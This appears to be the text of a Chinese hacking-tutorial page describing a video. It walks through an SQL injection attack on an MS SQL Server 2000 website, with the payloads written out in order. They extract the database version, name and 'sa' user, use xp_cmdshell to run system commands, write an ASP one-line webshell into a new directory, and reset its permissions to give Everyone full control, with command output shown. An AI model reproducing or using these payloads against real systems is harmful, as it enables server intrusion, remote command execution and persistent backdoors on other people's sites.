动画介绍: and (select @@version)>0 and ’’=’ 暴数据库版本 Microsoft SQL Server 2000 - 8.00.194
and db_name()>0 and ’’=’ 数据库名称 newkuai
and system_user>0 and ’’=’ 当前数据库用户名 sa
加 ~ 暴网站根目录 C:\Inetpub\wwwroot\web\newkuai\
;exec master.dbo.xp_cmdshell ’ipconfig > C:\Inetpub\wwwroot\web\newkuai\3.txt’--
测试xp_cmdshell是否被删除
;exec master.dbo.xp_cmdshell ’echo ^<%25execute(request("cmd"))%25^> > C:\Inetpub\wwwroot\web\newkuai\anquan\12.asp’-- 写入一句话小马
没有权限
我们自己创建个目录
;exec master.dbo.xp_cmdshell ’mkdir C:\Inetpub\wwwroot\web\newkuai\anquan’--
创建目录anquan
;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\anquan > C:\Inetpub\wwwroot\web\newkuai\56.txt’-- 查看在web目录下的权限设置
C:\Inetpub\wwwroot\web\newkuai\anquan BUILTIN\Administrators:(OI)(CI)F
WWW\ASPNET:(OI)(CI)C
Everyone:(OI)(CI)R
WWW\jessica:(OI)(CI)F
把权限提升~具有写入的权限·
;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\anquan /e /d everyone’--
;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\anquan /e /g everyone:F’--
在看一下他的权限~
C:\Inetpub\wwwroot\web\newkuai\anquan Everyone:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
WWW\ASPNET:(OI)(CI)C
WWW\jessica:(OI)(CI)F | 
安全中国首页 > 动画中心 > 综合漏洞动画
